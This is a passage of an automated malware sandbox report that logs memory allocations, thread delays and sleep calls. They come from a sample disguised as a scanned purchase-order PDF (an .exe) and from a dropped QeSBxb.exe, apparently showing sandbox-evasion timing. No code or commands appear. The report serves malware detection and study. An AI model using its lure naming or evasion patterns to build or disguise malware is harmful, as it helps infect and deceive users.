                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 8CC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: AEB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: B9D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: C9D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 1380000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 2E50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeMemory allocated: 1380000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599211Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598806Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598680Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598466Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeThread delayed: delay time: 593735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599656
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599470
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599344
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598672
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598452
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598343
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598234
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598125
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 598015
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597906
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597792
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597687
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597577
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597434
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597327
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597218
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597108
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 597000
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596890
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596781
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596672
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596562
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596451
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596343
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596234
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596125
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 596015
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595906
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595784
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595656
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595546
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595431
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595304
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 595172
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594994
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594875
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594765
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594656
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594546
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594437
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeThread delayed: delay time: 594326
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8091Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1582Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeWindow / User API: threadDelayed 3597Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeWindow / User API: threadDelayed 6209Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeWindow / User API: threadDelayed 2201
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeWindow / User API: threadDelayed 7661
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 1796Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 6676Thread sleep count: 3597 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 6676Thread sleep count: 6209 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599653s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599211s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598806s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598680s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598466s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -593860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe TID: 4080Thread sleep time: -593735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 3984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -27670116110564310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 6712Thread sleep count: 2201 > 30
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 6712Thread sleep count: 7661 > 30
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599470s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598672s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598452s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -598015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597792s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597577s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597434s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597327s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597108s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -597000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596672s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596451s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -596015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595784s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595431s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595304s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exe TID: 4668Thread sleep time: -595172s >= -30000s
